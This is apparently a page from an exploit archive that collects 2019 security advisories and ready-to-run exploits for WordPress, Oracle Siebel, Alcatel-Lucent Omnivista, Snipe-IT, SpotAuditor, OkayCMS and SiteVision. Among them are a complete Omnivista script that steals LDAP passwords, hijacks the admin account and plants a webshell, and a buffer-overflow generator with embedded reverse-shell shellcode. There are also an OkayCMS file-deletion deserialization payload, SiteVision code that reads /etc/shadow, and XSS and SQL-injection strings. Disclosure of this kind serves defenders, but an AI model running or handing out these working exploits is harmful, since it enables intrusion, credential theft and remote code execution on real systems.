WordPress Scoutnet Kalender plugin version 1.1.0 suffers from a cross site scripting vulnerability.

MD5 | e04e112fcfa436f18ef05c4933998c2c

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-045
Product: "Scoutnet Kalender" for WordPress
Manufacturer: Scoutnet and Björn Stromberg
Affected Version(s): 1.1.0
Tested Version(s): 1.1.0
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-10-23
Solution Date: -
Public Disclosure: 2019-12-09
CVE Reference: CVE-2019-19198
Author of Advisory: Simon Moser, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

"Scoutnet Kalender" is a plug-in for WordPress to display one oder many
Scoutnet calendars as a widget, on a page or an article.

Due to a missing input sanitation, it is vulnerable to cross-site scripting.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The plug-in allows to include calendars from Scoutnet into WordPress websites.
Calendars are not only included by websites administrated by the same person
as the calendar but also by other sites. When events from a calendar are
included, the data is not being sanitized. This allows an attacker with control
over an embedded calendar to inject scripts into the attacked site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Create an event with the following value of the "Info" field:
alert("Cross-Site Scripting");

2. Save the event

3. Visit the page where the calendar is embedded

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

As long as the default template is not changed by the manufacturer, SySS GmbH
recommends to change the provided template to sanitize fields controlled by
other users. If this is not possible because interactive content needs to be
included, the set of users with permissions to create and change events should
be as small as possible.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-10-20: Vulnerability discovered
2019-10-23: Vulnerability reported to manufacturer
2019-11-12: Discussion with the manufacturer about security by design
2019-12-09: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for "Scoutnet Kalender"
https://de.wordpress.org/plugins/scoutnet-kalender/
[2] SySS Security Advisory SYSS-2019-045
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-045.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Simon Moser of SySS
GmbH.

E-Mail: simon.moser@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Simon_Moser.asc
Key ID: 0x5FF2CFC6
Key Fingerprint: E3C2 A86E 530D 8BD3 C40B 6542 8376 5B89 5FF2 CFC6

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEE48KoblMNi9PEC2VCg3ZbiV/yz8YFAl3uaEsACgkQg3ZbiV/y
z8ZXmwf/fB1xUfu/2CbUGnq08H6QC2zYdh+ZVCM3EY2WkIQSfw1S2So1iRivnL2a
ZBx7oH1gM/4ynL+1H9JDvwYoePLDpSDK6wPdtxqMtllJsJkE6lgBWe8eHsLKs1QY
IZbyurXNJoZVZjULnZgP+3z3d/tCeua7PWTu/txvslQkWKj7OKtOEb1nK9FkJlax
Xej8eWRcikhl+JV3HLLSG23woLP852eh5mWYUu73ex5YU4J3a111GJOW2b6QImzn
f9LYvP/hsyXClr1B3bK51JUcUZzkz1motozB2gHwBJoi80WWR/zKTnvoMnYcXgDs
DKuo4rnpCRxaPqJPUke8snVqMHSTqQ==
=LPsA
-----END PGP SIGNATURE-----

Source

Oracle Siebel Sales version 8.1 suffers from a persistent cross site scripting vulnerability.

MD5 | e51ac3fef4c785e1fff5e0fc2bd40700

# Exploit Title : Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting
# Exploit Author : omurugur
# Software link: https://www.oracle.com/tr/applications/siebel/
# Effective version : Oracle Siebel Sales 8.1
# CVE: N/A

# Examples Request;

POST /salesADMIN_trk/start.swe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64;
Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729;
.NET CLR 3.5.30729)
Host: X.X.X.X
Content-Length: 550
Pragma: no-cache
Cookie: SWEUAID=23; _sn=**-yVfB7JyKox4txS.fQJdh6us-fIdUQaQW0.oxIhK
Connection: close

s_1_1_26_0=&SWEVI=&SWERowId=1-5VWLXT4&SWEC=39&s_1_1_28_0=&SWEMethod=PostChanges&s_1_1_18_0=12/9/2019&SWEPOC=Account&SWEReqRowId=1&SWERPC=1&s_1_1_90_0=N&s_1_1_71_0=&s_1_1_72_0=&s_1_1_83_0=<IFRAME
SRC="javascript:alert('XSS');">&SWEApplet=Revenue%20Analysis%20Form%20Applet&SWEActiveApplet=Revenue%20Analysis%20Form%20Applet&s_1_1_51_0=%240.00&SWEView=Revenue%20Analysis%20View&SWECmd=InvokeMethod&s_1_1_65_0=&s_1_1_21_0=%240.00&s_1_1_55_0=SADMIN&SWETS=1575878518105&SWEActiveView=Revenue%20Analysis%20View&s_1_1_89_0=&s_1_1_78_0=%240.00&SWEP=&s_1_1_36_0=N&s_1_1_14_0=0.000000&SWERowIds=

Source

Alcatel-Lucent Omnivista 8770 suffers from a remote code execution vulnerability.

MD5 | 0f7cc26132500939004bd71ceacd597f

# Exploit Title: Alcatel-Lucent Omnivista 8770 - Remote Code Execution
# Google Dork: inurl:php-bin/webclient.php
# Date: 2019-12-01
# Author: 0x1911
# Vendor Homepage: https://www.al-enterprise.com/
# Software Link: https://www.al-enterprise.com/en/products/communications-management-security/omnivista-8770-network-management-system
# Version: All versions, still unpatched
# Tested on: Windows 2003/2008
# CVE : 0day

# Exploit attached, also available here https://git.lsd.cat/g/omnivista-rce/src/master/omnivista.py
# Full writeup at https://git.lsd.cat/g/omnivista-rce/src/master/README.md


'''
Original url: https://git.lsd.cat/g/omnivista-rce
Website: https://lsd.cat
'''
import requests
import socket
import ldap
import sys
from urllib.parse import urlparse
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

class OmniVista:
def __init__(self, host):
self.host = host
self.addr = (urlparse(self.host).hostname)
self.folders = ['php-bin/', 'soap-bin/', 'bin/', 'data/', 'Themes/', 'log/']
self.filename = "poc.php"
self.webshell = ""

def identify(self):
r = requests.get(self.host + 'php-bin/Webclient.php', verify=False)
if '8770' in r.text:
return 8770
elif '4760' in r.text:
return 4760
else:
return False

def checkldap(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
result = s.connect_ex((self.addr, 389))
if result == 0:
return True

def info(self):
r = requests.post(self.host + 'php-bin/info.php', data={"void": "phDPhd"}, verify=False)
if 'PHP Version' in r.text:
return r.text
else:
return False

def getpassword(self):
r = requests.get(self.host + 'php-bin/Webclient.php', verify=False)
id = r.headers['Set-Cookie'].split(";")[0].split("=")[1]
r = requests.get(self.host + 'sessions/sess_' + id, verify=False)
lenght = int(r.text.split("ldapSuPass")[1][3:5])
password = r.text.split("ldapSuPass")[1][7:7+lenght]
return password

def decodepassword(self, password):
counter = 0
key = 16
cleartext = ""
if password[0:5] == "{NMC}":
password = password[5:]
else:
return False
for char in password:
if 32 <= ord(char):
char = chr(ord(char) ^ key)
cleartext += char
else:
cleartext += char
if ord(char) != 0:
key = counter * ord(char) % 255 >> 3
else:
key = 16
counter += 1
return cleartext

def connectldap(self):
connect = ldap.initialize('ldap://' + self.addr)
connect.set_option(ldap.OPT_REFERRALS, 0)
connect.simple_bind_s(self.username, self.password)
result = connect.search_s('o=nmc', ldap.SCOPE_SUBTREE, '(cn=AdminNmc)')
print('[*] Current AdminNmc password: ' + str(result[0][1]['userpassword'][0]))
self.bind = connect
return True

def editadminpassword(self):
self.adminusername = "AdminNmc"
self.adminpassword = "Lsdcat_exploit1!"
self.bind.modify_s("uid=AdminNmc,cn=Administrators,cn=8770 administration,o=nmc", [(ldap.MOD_REPLACE, 'userpassword', self.adminpassword.encode('utf-8') )])
return True

def login(self):
self.session = requests.session()
r = self.session.post(self.host + 'php-bin/webclient.php', data = {"action": "loginCheck", "userLogin": self.adminusername, "userPass": self.adminpassword }, verify = False)
if 'Directory license is required!' in r.text:
return False
else:
return True

def exploit8770(self):
r = self.session.get(self.host + 'php-bin/webclient.php', params = {'action': 'editTheme', 'themeId': "2"}, verify=False)
r = self.session.post(self.host + 'php-bin/webclient.php',
data = {"action": "saveTheme", "themeId": "2"},
files = { "BgImg1": (self.filename, self.webshell, "image/png")},
verify = False)
if 'success' in r.text:
return True

def exec8770(self):
return requests.post(self.host + 'Theme2/' + 'poc.php', data = {"0": cmd}, verify=False).text

def exploit4760(self):
for folder in self.folders:
r = requests.post(self.host + 'php-bin/webclient.php',
data = {"action": "saveTheme", "themeId": "5/../../{}".format(folder), "themeDate": ""},
files = { "BgImg1": (self.filename, self.webshell, "image/png")},
verify=False)
if 'success' in r.text:
self.folder = folder
return True

def exec4760(self, cmd):
return requests.post(self.host + self.folder + 'poc.php', data = {"0": cmd}, verify=False).text

def autoexploit(self):
print('[*] Attempting to exploit on {}'.format(self.host))
self.model = self.identify()
if self.model == 4760:
print('[*] Model is {}'.format(str(self.model)))
self.exploit4760()
print('[*] Upload folder is {}'.format(self.folder))
output = self.exec4760("whoami")
print('[*] Webshell at {}{}{}'.format(self.host, self.folder, self.filename))
print('[*] Command output: '.format(output))
elif self.model == 8770:
print('[*] Model is {}'.format(str(self.model)))
self.username = "cn=Directory Manager"
self.password = self.decodepassword(self.getpassword())
print('[*] {} password is "{}"'.format(self.username, self.password))
if self.checkldap():
print('[*] LDAP Service is accessible!')
self.connectldap()
print('[*] Changing AdminNmc password')
self.editadminpassword()
print('[*] Logging in')
if self.login():
self.exploit8770()
output = self.exec8770("whoami")
print('[*] Webshell at {}{}{}'.format(self.host, "themes/Theme2/", self.filename))
print('[*] Command output: '.format(output))
else:
print("[x] Directory license not installed :/")
return False
else:
print("[x] LDAP Service is not directly accessible")
return False

else:
print("[x] Target is not an OmniVista 4760/8770")
return False

if len(sys.argv) != 2:
print("Usage: ./omnivista.py http(s)://target.tld:port/")
else:
exploit = OmniVista(sys.argv[1])
exploit.autoexploit()

Source

Snipe-IT Open Source Asset Management version 4.7.5 suffers from a persistent cross site scripting vulnerability.

MD5 | ab654a127618deb61eec45dcac220261

# Exploit Title: Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://snipeitapp.com/
# Software Link: https://github.com/snipe/snipe-it/releases/tag/v4.7.5
# Version: 4.7.5
# Category: Webapps
# Tested on: Xampp for Windows

# Description:
# Snipe-IT v4.7.5 has persistent cross-site scripting vulnerability via uploading svg file in accessories section.
# A malicious authorized user could potentially upload an SVG with a javascript payload.

#Steps to Reproduce:

Upload crafted SVG file when sent request to create accessory.
Click created accessory and copy uploaded file location.
Browse uploaded SVG file location on browser.
The alert box will be opened.

#(PoC) Post Request:

POST /accessories HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/accessories/create
Content-Type: multipart/form-data; boundary=---------------------------6547029722068941066578895105
Content-Length: 1761
Cookie: XSRF-TOKEN=eyJpdiI6Ikh1TURMRnpyVDJsaVh4WUI5MWtQWnc9PSIsInZhbHVlIjoiUUNOcVErbFpcL0hGbmVveU9wYzZlOWRrVXNBbWxqeDBQZ3drbW4yZ2RXWU1POGlQQnVOeG5EcThxaUUraGdSYmlCMmNIc2VMMERxYnJOWDRBRUhmdEx3PT0iLCJtYWMiOiI2ZTg5YTA2MmUxZWRmM2RjYTNmNzI4YTE0YTQyOTQ4MGEzMDYyYWJiMDk5NGYwOWE4M2Y4ZTc4MWMxYzJhOGY1In0%3D; snipeitv4_session=KvsAzbhBKlUwbijPmLc86vCgO0PhG67J6EIIR0MD; laravel_token=eyJpdiI6InRTXC83Qmx0aDdVTE9EbVJzSnJ4V01nPT0iLCJ2YWx1ZSI6InVITklNQ3h3WldXMFIzY01Ob0Zqb1wvdm1NQTZXN3JuXC9Nc0g5Z0lpWXZCaTdiVHFOUVB4ZkpmQWRrVk1ZWVZFN1dZVnRrM3pRdjRCcWxySDRtd3hEWlIxd0h5QThUMDAyaVJcL0YzTmhFMlVlNzVFSG95S2VVYVBiRzNzNUtIOTkwdlBWUmQ1K3dTZHNNeXZJWVNmaWczb2hyOGFWRmI1a1NiNk84a1wvOW1tWXpleTMzSnRwYlowenBHSzN4dHRzd2lUTXd1b1dLNkluMEt2bWE0M1J4UTBaNGMzTGFQWEVOWnNyQk1aQk1nQ0tBejVjUU9XRnc5Q0l0citqSnJlbzgwTEVWQlN5ekdZa2hYckQ5T1ZKc2E2UT09IiwibWFjIjoiZDZhNWE2NjFmOTMwOWI0N2E2NjE3YTQwNWFlYjg0MmMyYTkwYzE1YTc4ZWI3N2U1ZWFjNGIyMzM4ZWU2NjczMyJ9
Connection: close
Upgrade-Insecure-Requests: 1

.
..
snip
..
.

Content-Disposition: form-data; name="image"; filename="test.svg"
Content-Type: image/svg+xml





alert(1);



-----------------------------6547029722068941066578895105--

Source

PRO-7070 Hazir Profesyonel Web Sitesi version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | 791eab6baad5a9a9903848ffb987623d

# Exploit Title: PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass
# Date: 2019-12-08
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.websitem.biz/hazir-site/pro-7070-hazir-mobil-tablet-uyumlu-web-sitesi
# Tested on: Kali Linux
# Version: 1.0
# CVE: N/A

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/pass.asp
Username: '=' 'or'
Password: '=' 'or'

Source

SpotAuditor version 5.3.2 Base64 local buffer overflow SEH exploit.

MD5 | 67c769fde0bc2d49be93a7f6690b9476

# Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)
# Exploit Author: Kirill Nikolaev
# Date: 2019-12-06
# Vulnerable Software: SpotAuditor
# Vendor Homepage: http://www.nsauditor.com/
# Version: 5.3.2
# Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Tested Windows 7 SP1 x86

# PoC
# 1. Download and install SpotAuditor
# 2. Change shellcode in python script to yours
# 3. Generate payload with python script
# 4. Run the software "Tools -> Base64 Encrypted Password
# 5. Take a shell
# Original DOS exploit https://www.exploit-db.com/exploits/47719

#!/usr/bin/env python

import base64
print ("[+] Thank you for choosing our company")
print ("[+] Local Buffer Overflow (SEH) in SpotAuditor 5.3.2")
print ("[+] Created By Kirill Nikolaev")
print ("[+] Generate payload,check, that you take your shellcode")
print ("")
head='A'*1024
#eb0c-jmp across a few bytes with seh address
jmp_across='x41x41xebx0c'
#0x61e0b194 : pop ebx # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.15.2 (C:Program FilesNsasoftSpotAuditorsqlite3.dll)
seh='x94xb1xe0x61'
header_for_shellcode='x41'*10
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.58.1 LPORT=4444 -f py EXITFUNC=thread -b 'x00'
buf = ""
buf += b"xbdx7axfex84xddxdbxc9xd9x74x24xf4x58x31"
buf += b"xc9xb1x52x83xe8xfcx31x68x0ex03x12xf0x66"
buf += b"x28x1exe4xe5xd3xdexf5x89x5ax3bxc4x89x39"
buf += b"x48x77x3ax49x1cx74xb1x1fxb4x0fxb7xb7xbb"
buf += b"xb8x72xeexf2x39x2exd2x95xb9x2dx07x75x83"
buf += b"xfdx5ax74xc4xe0x97x24x9dx6fx05xd8xaax3a"
buf += b"x96x53xe0xabx9ex80xb1xcax8fx17xc9x94x0f"
buf += b"x96x1exadx19x80x43x88xd0x3bxb7x66xe3xed"
buf += b"x89x87x48xd0x25x7ax90x15x81x65xe7x6fxf1"
buf += b"x18xf0xb4x8bxc6x75x2ex2bx8cx2ex8axcdx41"
buf += b"xa8x59xc1x2exbex05xc6xb1x13x3exf2x3ax92"
buf += b"x90x72x78xb1x34xdexdaxd8x6dxbax8dxe5x6d"
buf += b"x65x71x40xe6x88x66xf9xa5xc4x4bx30x55x15"
buf += b"xc4x43x26x27x4bxf8xa0x0bx04x26x37x6bx3f"
buf += b"x9exa7x92xc0xdfxeex50x94x8fx98x71x95x5b"
buf += b"x58x7dx40xcbx08xd1x3bxacxf8x91xebx44x12"
buf += b"x1exd3x75x1dxf4x7cx1fxe4x9fx42x48xdcx5e"
buf += b"x2bx8bx20x70xf7x02xc6x18x17x43x51xb5x8e"
buf += b"xcex29x24x4exc5x54x66xc4xeaxa9x29x2dx86"
buf += b"xb9xdexddxddxe3x49xe1xcbx8bx16x70x90x4b"
buf += b"x50x69x0fx1cx35x5fx46xc8xabxc6xf0xeex31"
buf += b"x9ex3bxaaxedx63xc5x33x63xdfxe1x23xbdxe0"
buf += b"xadx17x11xb7x7bxc1xd7x61xcaxbbx81xdex84"
buf += b"x2bx57x2dx17x2dx58x78xe1xd1xe9xd5xb4xee"
buf += b"xc6xb1x30x97x3ax22xbex42xffx42x5dx46x0a"
buf += b"xebxf8x03xb7x76xfbxfexf4x8ex78x0ax85x74"
buf += b"x60x7fx80x31x26x6cxf8x2axc3x92xafx4bxc6"
tail='B'*(5000-1028-4-10-len(buf))
shellcode=head+jmp_across+seh+header_for_shellcode+buf
print (base64.b64encode(shellcode))


--
Best regards,
Kirill Nikolaev
Penetration Tester

Source

Proof of concept exploit that demonstrates a Microsoft Windows 10 UAC bypass for all executable files which are autoelevate true.

MD5 | be518251e625f0ce8b117adc6513daf5

Source

This is a full browser compromise exploit chain targeting Mozilla Firefox on Windows 64-bit. It uses CVE-2019-9810 for getting code execution in both the content process as well as the parent process and CVE-2019-11708 to trick the parent process into browsing to an arbitrary URL.

MD5 | 32076a29fcf91fd367322669891704a7

Source

OkayCMS versions 2.3.4 and below suffer from remote code execution vulnerability.

MD5 | ac48925812fe6df9cf4011ec5409f36d

# Unauthenticated remote code execution in OkayCMS

## Overview
* Identifier: AIT-SA-20191129-01
* Target: OkayCMS
* Vendor: OkayCMS
* Version: all versions including 2.3.4
* CVE: CVE-2019-16885
* Accessibility: Local
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[OkayCMS is a simple and functional content managment system for an online store.](https://okay-cms.com)

## Vulnerability Description
An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in "view/ProductsView.php" using the cookie "price_filter" or in "api/Comparison.php" via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in "api/Comparison.php":

```
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
```

The unsafe deserialization also occurs in "view/ProductsView.php":

```
$price_filter = unserialize($_COOKIE['price_filter']);
```


## Proof of Concept
The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:

```
<?php

if($argc != 3)
{
print "usage: $argv[0] n";
exit(1);
}

$url = $argv[1];
$file = $argv[2];

class Smarty_Internal_CacheResource_File {

public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
$cached->is_locked = false;
@unlink($cached->lock_id);
}
}

class Smarty_Template_Cached {
public $handler = null;
public $is_locked = true;
public $lock_id = "";

public function __construct() {
$this->lock_id = $GLOBALS['file'];
$this->handler = new Smarty_Internal_CacheResource_File;
}
}


class Smarty {
public $cache_locking = true;
}

class Smarty_Internal_Template {
public $smarty = null;
public $cached = null;

public function __construct() {
$this->smarty = new Smarty;
$this->cached = new Smarty_Template_Cached;
}

public function __destruct(){
if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
$this->cached->handler->releaseLock($this->smarty, $this->cached);
}
}
}

$obj = new Smarty_Internal_Template();

$serialized = serialize($obj);

$un = unserialize($serialized);

$headers = [
'Accept-Language: en-US,en;q=0.5',
"Referer: $url/en/catalog/myagkie-igrushki",
'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_HTTPHEADER => $headers,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price",
CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if(curl_error($curl)) {
print curl_error($curl);
}
curl_close($curl);


print $resp;

?>
```

## Notes
Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.

## Vulnerable Versions
versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too.

## Tested Versions
OkayCMS-Lite 2.3.4

## Impact
An unauthenticated attacker could upload a webshell to the server and execute commands remotely.

## Mitigation
At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.

## References:
* https://nvd.nist.gov/vuln/detail/CVE-2019-16885

## Vendor Contact Timeline

* `2019-08-29` Contacting the vendor
* `2019-09-04` Vendor replied
* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix
* `2019-09-29` Public disclosure

## Advisory URL
[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms)



Source

SiteVision suffers from an issue where attackers may execute arbitrary code as root on the target server after gaining access to a low-privilege account. All versions of SiteVision 4 until 4.5.6 and all versions of SiteVision 5 until 5.1.1 are vulnerable.

MD5 | d41da44b8c24a9290a4500079e64ac00

# SiteVision Remote Code Execution

CVE-2019-12733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12733
https://www.cybercom.com/About-Cybercom/Blogs/Security-Advisories/high-risk-vulnerabilities-in-cms-product/

## Summary
Attackers may execute arbitrary code as root on the target server after gaining access to a low-privilege account.

## Vendor Description
SiteVision AB is a Swedish product company focused on developing the portal and web publishing platform SiteVision.

## Affected Versions
All versions of SiteVision 4 until 4.5.6.
All versions of SiteVision 5 until 5.1.1.
Earlier major versions are assumed to be vulnerable.

## Technical Details
The SiteVision application does not sufficiently validate whether or not the current user is permitted to add or edit modules of the "script" type. This means that a low-privilege user such as an Editor ("Redaktör") can inject a new script module, or edit an existing one, and leverage it to execute arbitrary code.

The access control flaw allowing users to inject non-authorized modules are described separately in CVE-2019-12734.

While the scripts are written in JavaScript, the environment allows the developer to reach and import Java APIs.

Reproduced on SiteVision 4 and 5; the following steps applies to SiteVision 5:

1. Install SiteVision and either create or import a new site.
2. Set up and create an Editor ("Redaktör") user.
3. Log on as the new low-privilege user.
4. Create a new page and note how only basic modules are available.
5. Insert a text module.
6. Re-send the HTTP request generated in step #5, but change the value of portletType from "text" to "script". The following is the resulting request for our demo environment:

```
POST /edit-api/1/4.549514a216b1c6180f41c3/4.549514a216b1c6180f41c3/portlet HTTP/1.1
Host: fast.furious
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://fast.furious/edit/4.549514a216b1c6180f41c3
Content-Type: application/json; charset=utf-8
X-CSRF-Token: [...]
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close
Cookie: [...]

{"portletType":"script","relativeElement":"12.549514a216b1c6180f41d0"}
```

7. Issue the modified request to the application.
8. Reload the current page and note how it now contains a script module.
9. Edit the script module to contain the following JavaScript code:

```
const app = (() => {
'use strict';

importPackage(java.io);
importPackage(java.lang);

const init = () => {
var result = [];

var p = Runtime.getRuntime().exec("whoami");
var stdInput = new BufferedReader( new InputStreamReader( p.getInputStream() ) );
var s;
while (( s = stdInput.readLine()) != null) {
result.push(s);
}

return result;

};

return { init: init };
})();

const context = app.init();
```

9b. Following PoC can be used for reading files such as /etc/passwd or /etc/shadow:

```
const app = (() => {
'use strict';

importPackage(java.io);
importPackage(java.lang);

const init = () => {
var result = [];
var file = new File('/etc/passwd');
var br = new BufferedReader(new FileReader(file));

var st;
while ((st = br.readLine()) != null) {
result.push(st);
}

return result;
};

return { init: init };
})();

const context = app.init();
```

10. Enter the following Velocity code:

```


Script output:

As List:

    #foreach( $c in $context )

  • $c
  • Source